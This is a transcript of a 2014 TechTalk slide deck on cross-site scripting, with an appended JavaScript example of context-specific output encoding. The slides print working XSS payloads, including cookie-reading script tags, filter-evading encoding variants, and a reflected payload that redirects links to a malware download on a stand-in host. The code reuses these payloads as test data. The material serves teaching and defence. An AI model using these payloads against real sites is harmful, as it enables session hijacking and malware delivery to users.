TechTalk - Cross Site Scripting XSS

Jürgen Kranz and Justice Nanhou (Architecture and Development Department at axxessio) focused on Cross Site Scripting XSS during this TechTalk.

Published in: Technology

Transcript

  • 1. Cross Site Scripting XSS. TechTalk, February 2014. Department: Architecture and Development
  • 2. Table of Contents
    » Introduction
    » Stored XSS
    » Reflected XSS
    » DOM Based XSS
    » XSS Attack Consequences
    » How to Protect Yourself
  • 3. Introduction: https://www.owasp.org/index.php/Top_10_2013-Release_Notes
  • 4. Introduction
    » XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping.
    » It allows attackers to execute scripts in the victim’s browser, which can:
      » hijack user sessions,
      » deface web sites, or
      » redirect the user to malicious sites.
  • 5. Introduction: https://www.youtube.com/watch?v=_Z9RQSnf8-g
  • 6. Stored XSS Attacks
    » The injected code is permanently stored on the target servers:
      » Database
      » Message forum
      » Visitor log
      » Comment field
      » …
    » The victim then retrieves the malicious script from the server when it requests the stored information.
  • 7. Stored XSS Attacks (demo): Test XSS, <script>alert(document.cookie)</script>
  • 8. Stored XSS Attacks (demo): Test XSS, <script>alert(document.cookie)</script>
  • 9. Reflected XSS Attacks
    » The injected code is reflected off the web server, such as in:
      » An error message
      » Search result
      » An e-mail message
      » Or any other response that includes some or all of the input sent to the server as part of the request
  • 10. Reflected XSS Attacks (example request)
    http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
  • 11. Reflected XSS Attacks: different syntax or encoding of the same payload
    " onfocus="alert(document.cookie)
    "><script >alert(document.cookie)</script >
    "%3cscript%3ealert(document.cookie)%3c/script%3e
    "><ScRiPt>alert(document.cookie)</ScRiPt>
  • 12. DOM Based XSS
    » The DOM, or Document Object Model, is the structural format used to represent documents in a browser.
    » DOM Based XSS is the de-facto name for XSS bugs in which the page’s own client-side script places untrusted data into the document, for example:
      <script> document.write("Site is at: " + document.location.href + "."); </script>
  • 13. XSS Attack Consequences
    » The consequence is the same regardless of whether it is stored, reflected or DOM based.
    » The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account.
    » It can also include:
      » the disclosure of end user files
      » installation of Trojan horse programs
      » redirecting the user to some other page or site
      » modifying the presentation of content.
  • 14. How to Protect Yourself
    » Escape output provided by users: HTML encode any <, >, &, ‘, “ or don’t allow it
    » Validate user data to make sure it meets your expectations
    » Use an HTML policy engine to validate or clean user-driven HTML in an outbound way
    » Attribute-escape before inserting untrusted data into HTML common attributes:
      String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );
    » JavaScript-escape before inserting untrusted data into JavaScript data values:
      String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
  • 15. Thank you for your attention!
  • 16. Additional Information
    » OWASP YouTube Channel: https://www.youtube.com/watch?v=_Z9RQSnf8-g
    » OWASP: https://www.owasp.org/index.php/XSS and https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
    » OWASP Protect ME: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    » Obscurity by Security, and Other Techitudes by Adam Jon R.: http://adamjonrichardson.com/2012/02/01/improving-xss-cross-site-scriptingprevention-in-four-simple-steps/
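The context-specific output encoding that slide 14 recommends, as an added JavaScript example that is not part of the TechTalk or of ESAPI: a body-context encoder for the five listed characters, a stricter attribute-context encoder, and a raw versus encoded rendering of the reflected parameter from slide 10, checked against constructed payloads modelled on slides 7 and 11. The render and check functions are hypothetical helpers, and the attribute encoder assumes its output always lands inside a double-quoted attribute value.

```javascript
// Added example, not from the TechTalk: context-specific output encoding as slide 14
// advises, checked against constructed payloads modelled on slides 7 and 11.

// HTML body context: encode the five characters slide 14 lists (<, >, &, ', ").
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHTML(input) {
  return String(input).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Attribute context: encode every non-alphanumeric character as &#xHH;, the stricter
// rule an attribute encoder such as ESAPI's encodeForHTMLAttribute applies. Assumes
// the result is always placed inside a double-quoted attribute value.
function encodeForHTMLAttribute(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// Reflected-XSS shape from slide 10: a request parameter echoed straight into the page.
function renderGreetingUnsafe(user) {
  return `<p>Hello ${user}</p>`;
}
// Same template with the parameter encoded for the body context.
function renderGreetingSafe(user) {
  return `<p>Hello ${encodeForHTML(user)}</p>`;
}
// A search box echoing the query into a quoted attribute: raw, then encoded for that context.
function renderSearchBoxUnsafe(query) {
  return `<input name="q" value="${query}">`;
}
function renderSearchBoxSafe(query) {
  return `<input name="q" value="${encodeForHTMLAttribute(query)}">`;
}

// Constructed payloads modelled on the slide 7 and slide 11 variants.
const PAYLOADS = [
  '<script>alert(document.cookie)</script>',
  '" onfocus="alert(document.cookie)',
  '"><ScRiPt>alert(document.cookie)</ScRiPt>',
];

// Detection helper: does the rendered HTML contain a script tag, or an event-handler
// attribute inside a tag, that came from the payload rather than from the template?
function containsLiveMarkup(html) {
  return /<\s*script/i.test(html) || /<[^>]*\son\w+\s*=/i.test(html);
}

// True when the given renderer neutralises every payload.
function neutralisesAll(renderFn) {
  return PAYLOADS.every((p) => !containsLiveMarkup(renderFn(p)));
}
```

Note that the body-context renderer leaves the `" onfocus=` payload inert even unencoded, while the attribute-context one does not; that difference is why slide 14 lists a separate attribute encoder.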